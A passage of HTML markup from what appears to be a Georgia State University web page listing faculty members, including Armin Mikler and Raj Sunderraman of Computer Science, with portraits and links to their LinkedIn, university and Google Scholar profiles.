h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 